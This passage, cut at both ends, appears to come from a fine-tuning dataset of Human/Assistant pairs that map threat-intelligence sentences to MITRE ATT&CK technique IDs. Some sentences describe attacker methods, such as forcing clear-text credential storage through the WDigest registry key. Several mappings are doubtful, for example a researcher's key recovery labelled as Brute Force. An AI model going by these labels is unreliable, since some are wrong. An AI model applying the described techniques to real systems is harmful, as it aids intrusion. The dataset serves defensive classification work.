the techniques and ID from MITRE ATT&CK framework., Ammy ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 likely obtained a list of hosts in the victim environment.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has decoded a base64 encoded document which was embedded in a VBS script.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Parameter Description ‘u=’ This parameter contains target machine information in the following format: , , , , <1.3>, < KdfrJKN >, ‘&h=’ This parameter includes the information about the command executed and its results### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used DLL side-loading to covertly load PoisonIvy into memory on the victim machine.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can collect the user name, Windows version, computer name, and available space on discs from a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka is capable of performing screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware to drop encrypted CAB files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used tools including NMAP to conduct broad scanning to identify open ports.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has modified the Registry key HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet sends compromised victim information via HTTP.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used legitimate local admin account credentials.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown , and chmod .### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can use HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can identify the IP address of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used macros to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has obtained and leveraged publicly-available tools for early intrusion activities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER uses the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth — This web shell and credential stealer deployed to Microsoft Exchange servers is installed as an ISAPI filter### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug extracted documents and bundled them into a RAR archive.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When using the Create Account technique with a userID under 500 and enabling this property , an adversary can conceal user accounts.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory domains, and local/external IP addresses.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can download files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used a tool to capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can perform a long sleep to evade detection.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Time providers are implemented as dynamic-link libraries that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We are unable to confirm if all of these stolen credentials are indeed valid sets of credentials, but based upon previously observed activity, timestamping, and known behaviors, it is highly probable that these credentials were or may still be valid### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has used tasklist to enumerate processes and find a specific string.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 staged data and files in password-protected archives on a victim's OWA server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon has used RSA encryption for C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug extracted Word documents from a file server on a victim network.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has collected compromised credentials to use for targeting efforts.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has relied on user interaction to open their spearphishing attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The locations: For root user path: /Library/CoreMediaIO/Plug-Ins/FCP-DAL/iOSScreenCapture.plugin/Contents/Resources/ processname: screenassistantd For regular user path: ~/Library/Spelling/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to delete emails used for C2 once the content has been copied.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has compromised email accounts to conduct social engineering attacks.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has archived collected files with WinRAR, prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has a command to list files on a system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P8RAT can check for specific processes associated with virtual environments.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: cc The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has created local privileged users on victim machines.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misconfiguration by end users is a common problem.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton uses a keylogger to capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ptrace system call enables a debugging process to observe and control another process , including changing memory and register values.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has masqueraded as a Flash Player installer through the executable file install_flash_player.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to retrieve information about shares on remote hosts.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can get user agent strings for the default browser from HKCU\Software\Classes\http\shell\open\command.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used malware obtained after compromising other threat actors, such as OilRig.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used frp, ssf, and Venom to establish SOCKS proxy connections.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used COM scriptlets to download Cobalt Strike beacons.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file names may vary from one version of the malware to another### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack can kill processes and delete services.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise executes systeminfo after initial communication is made to the remote server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke exploited Apache Struts, Oracle WebLogic , and Adobe ColdFusion vulnerabilities to deliver malware.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script is signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A flood of ACK packets are sent to the target.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT can obtain the date and time of a system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY uses a DGA to derive command and control URLs from a word list.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib creates Registry keys to allow itself to run as various services.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT has the ability to recursively enumerate files on an infected endpoint.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok prompts the user for credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows User Account Control allows a program to elevate its privileges to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has modified the firewall using netsh.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses a function named is_debugging to perform anti-debugging logic.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Msiexec.exe can also execute DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can detect VMWare via its I/O port and Virtual PC via the vpcext instruction.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon is known to use software packing in its tools.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can infect victims by brute forcing SMB.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also securely removes itself after collecting and exfiltrating data.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We were able to brute force the actor-provided key using the inverse arithmetic operations using the embedded salt and embedded ciphertext, so we were able to extract the embedded webshells with ease### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang backdoor RoyalDNS established persistence through adding a service called Nwsapagent.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy uses cmd.exe to execute itself in-memory.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has attempted to disguise itself by registering under a seemingly legitimate service name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may scan victim IP blocks to gather information that can be used during targeting.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique can also execute local/remote scripts and, similar to its Regsvr32/ ""Squiblydoo"" counterpart, leverages a trusted, built-in Windows tool.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used multiple command-line utilities to enumerate running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has used the open source UPX executable packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to retrieve a list of services on the infected host.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used masscan to search for open Docker API ports.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may configure services to execute at startup in order to persist on a system.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools used to block execution and/or uncover artifacts of Persistence.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D uses PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has acquired credentials from the SAM/SECURITY registry hives.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install malicious components to extend and abuse server applications.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to download files from C2 to the infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools such as MailSniper can be used to automate searches for specific keywords.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can collect the time zone information from the system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has used Ngrok to establish C2 and exfiltrate data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has exfiltrated data over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have used cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can query the Registry to get random file extensions to append to encrypted files.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has utilized multiple commands to identify data of interest in file and directory listings.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As with legitimate development efforts, different skill sets may be required for developing capabilities.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar adds a .lnk file to the Windows startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can disable Security Center functions like the Windows Firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shared templates may also be stored and pulled from remote locations.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has collected and exfiltrated payment card data from compromised systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth collects the timestamp from the infected machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgent uses HTTP requests to communicate with its C2 servers, which allows the threat actor to interact with the compromised system### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create an account to maintain access to victim systems.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly saves itself with a leading "".""### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can use API hooks on ""GetExtendedTcpTable"" to retrieve a table containing a list of TCP endpoints available to the application.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces , or from individuals.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the “forfiles” utility### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper communicates to its C2 server over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT supports file encryption .### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has been delivered by sending victims a phishing email containing a malicious .docx file.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has named services to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok uses AppleScript to install a login Item by sending Apple events to the System Events process.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SIDs are used by Windows security in both security descriptors and access tokens.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can collect the computer name of a targeted system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate accounts to maintain access to victim systems.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can delete files from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each of the emails had a password protected RAR archive attached named credential.rar### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT used TLS to encrypt command and control communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can direct BACKSPACE to upload files to the C2 Server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MirageFox has the capability to execute commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can use DNS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used scheduled tasks establish persistence for TrickBot and other malware.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.### Assistant: T1092: Communication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery 